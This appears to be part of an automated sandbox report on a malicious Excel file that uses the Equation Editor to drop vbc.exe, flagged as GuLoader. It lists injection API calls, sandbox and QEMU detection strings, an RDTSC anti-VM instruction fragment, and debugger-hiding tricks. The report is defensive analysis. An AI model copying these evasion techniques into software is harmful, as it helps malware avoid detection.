Source: C:\Users\Public\vbc.exe Code function: 9_2_001B2E64 9_2_001B2E64
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B469F 9_2_001B469F
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B9C8B 9_2_001B9C8B
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B4E8F 9_2_001B4E8F
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B92B3 9_2_001B92B3
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B9AB0 9_2_001B9AB0
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B4CB6 9_2_001B4CB6
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B18AA 9_2_001B18AA
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B3AA5 9_2_001B3AA5
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B9ADB 9_2_001B9ADB
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B8EC2 9_2_001B8EC2
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B9B3B 9_2_001B9B3B
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B4B39 9_2_001B4B39
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B4933 9_2_001B4933
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B5D30 9_2_001B5D30
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B4523 9_2_001B4523
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B8F9F 9_2_001B8F9F
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B4D95 9_2_001B4D95
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B8D8F 9_2_001B8D8F
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B5D81 9_2_001B5D81
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B8FB1 9_2_001B8FB1
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B9DB7 9_2_001B9DB7
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B4DAB 9_2_001B4DAB
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B8BAC 9_2_001B8BAC
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B59A3 9_2_001B59A3
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B3DA1 9_2_001B3DA1
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B7DA0 9_2_001B7DA0
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B7FFF 9_2_001B7FFF
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B8BFF 9_2_001B8BFF
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B49EB 9_2_001B49EB
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D26BE NtWriteVirtualMemory, 6_2_003D26BE
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D0EAE CloseServiceHandle,NtWriteVirtualMemory,TerminateProcess,LoadLibraryA, 6_2_003D0EAE
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D5D1F NtWriteVirtualMemory,NtAllocateVirtualMemory, 6_2_003D5D1F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D958B NtProtectVirtualMemory, 6_2_003D958B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4835 NtWriteVirtualMemory, 6_2_003D4835
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D960D NtProtectVirtualMemory, 6_2_003D960D
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8C0F NtWriteVirtualMemory, 6_2_003D8C0F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D5E07 NtAllocateVirtualMemory, 6_2_003D5E07
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D5003 NtWriteVirtualMemory, 6_2_003D5003
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D507A NtWriteVirtualMemory, 6_2_003D507A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4266 NtWriteVirtualMemory, 6_2_003D4266
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4CB6 NtWriteVirtualMemory, 6_2_003D4CB6
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D469F NtWriteVirtualMemory, 6_2_003D469F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4E8F NtWriteVirtualMemory, 6_2_003D4E8F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D46F9 NtWriteVirtualMemory, 6_2_003D46F9
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D48F4 NtWriteVirtualMemory, 6_2_003D48F4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D46DE NtWriteVirtualMemory, 6_2_003D46DE
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4B39 NtWriteVirtualMemory, 6_2_003D4B39
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D493B NtWriteVirtualMemory, 6_2_003D493B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4523 NtWriteVirtualMemory, 6_2_003D4523
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D491A NtWriteVirtualMemory, 6_2_003D491A
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4D73 NtWriteVirtualMemory, 6_2_003D4D73
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D49BB NtWriteVirtualMemory, 6_2_003D49BB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4DAB NtWriteVirtualMemory, 6_2_003D4DAB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4D95 NtWriteVirtualMemory, 6_2_003D4D95
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D4D89 NtWriteVirtualMemory, 6_2_003D4D89
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D5D81 NtAllocateVirtualMemory, 6_2_003D5D81
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D51F3 NtWriteVirtualMemory, 6_2_003D51F3
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B5CD5 NtAllocateVirtualMemory, 9_2_001B5CD5
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B5E07 NtAllocateVirtualMemory, 9_2_001B5E07
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B5D30 NtAllocateVirtualMemory, 9_2_001B5D30
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B5D81 NtAllocateVirtualMemory, 9_2_001B5D81
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: vbc[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write (2 occurrences)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write (2 occurrences)
Source: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx Virustotal: Detection: 38%
Source: #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx ReversingLabs: Detection: 28%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$#U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR212.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@6/21@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.695092285.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405852 push ebx; ret 6_2_00405854
Source: C:\Users\Public\vbc.exe Code function: 6_2_004072B2 push cs; iretd 6_2_004072D0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040796C push ecx; iretd 6_2_00407985
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040772B push es; iretd 6_2_0040772C
Source: C:\Users\Public\vbc.exe Code function: 6_2_004075F1 push ebx; iretd 6_2_00407601
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D1077 push 0BFD29CAh; retf FD29h 6_2_003D10F2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003DA563 push edx; retf 6_2_003DA569
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8BA0 push edx; retf 6_2_003D8BAB
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B843D push es; ret 9_2_001B843E
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B15B3 push ebp; iretd 9_2_001B15B6
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B8BA0 push edx; retf 9_2_001B8BAB

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\Public\vbc.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000006.00000002.643663482.00000000003E0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: vbc.exe, 00000006.00000002.643663482.00000000003E0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040C090 second address: 000000000040C090 instructions: 0x00000000 rdtsc 0x00000002 cmp al, FEh 0x00000004 xor eax, edx 0x00000006 cmp esi, 00000097h 0x0000000c dec edi 0x0000000d cmp di, 00EFh 0x00000012 movq mm7, mm5 0x00000015 jmp 00007F6370A86402h 0x00000017 cmp edi, 00000000h 0x0000001a jne 00007F6370A86328h 0x00000020 cmp bh, 00000057h 0x00000023 mov ebx, 42152221h 0x00000028 cmp dl, FFFFFF80h 0x0000002b xor ebx, DC00070Fh 0x00000031 cmp bh, 00000023h 0x00000034 add ebx, 289BD3ABh 0x0000003a cmp edx, 14h 0x0000003d psubw xmm6, xmm7 0x00000041 jmp 00007F6370A86401h 0x00000043 sub ebx, C670F8D9h 0x00000049 cmp esi, 5Eh 0x0000004c cmp bh, 00000021h 0x0000004f rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 760 Thread sleep time: -360000s >= -30000s
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8304 rdtsc 6_2_003D8304
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\Public\vbc.exe Window / User API: threadDelayed 9848
Source: C:\Users\Public\vbc.exe System information queried: ModuleInformation
Source: vbc.exe, 00000006.00000002.643663482.00000000003E0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: vbc.exe, 00000006.00000002.643663482.00000000003E0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\Public\vbc.exe Thread information set: HideFromDebugger
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8304 rdtsc 6_2_003D8304
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8C0F mov eax, dword ptr fs:[00000030h] 6_2_003D8C0F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D8C73 mov eax, dword ptr fs:[00000030h] 6_2_003D8C73
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3A50 mov eax, dword ptr fs:[00000030h] 6_2_003D3A50
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D58BB mov eax, dword ptr fs:[00000030h] 6_2_003D58BB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D3AB1 mov eax, dword ptr fs:[00000030h] 6_2_003D3AB1
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D788C mov eax, dword ptr fs:[00000030h] 6_2_003D788C
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D788F mov eax, dword ptr fs:[00000030h] 6_2_003D788F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D7ECE mov eax, dword ptr fs:[00000030h] 6_2_003D7ECE
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D39AB mov eax, dword ptr fs:[00000030h] 6_2_003D39AB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D2F96 mov eax, dword ptr fs:[00000030h] 6_2_003D2F96
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B5837 mov eax, dword ptr fs:[00000030h] 9_2_001B5837
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B8C73 mov eax, dword ptr fs:[00000030h] 9_2_001B8C73
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B788F mov eax, dword ptr fs:[00000030h] 9_2_001B788F
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B788C mov eax, dword ptr fs:[00000030h] 9_2_001B788C
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B7ECE mov eax, dword ptr fs:[00000030h] 9_2_001B7ECE
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B8BAC mov eax, dword ptr fs:[00000030h] 9_2_001B8BAC
Source: C:\Users\Public\vbc.exe Code function: 9_2_001B8BFF mov eax, dword ptr fs:[00000030h] 9_2_001B8BFF
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 6_2_003D60CF LdrInitializeThunk, 6_2_003D60CF

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: vbc.exe, 00000009.00000002.695186981.0000000000A90000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000009.00000002.695186981.0000000000A90000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: vbc.exe, 00000009.00000002.695186981.0000000000A90000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Stealing of Sensitive Information:

GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior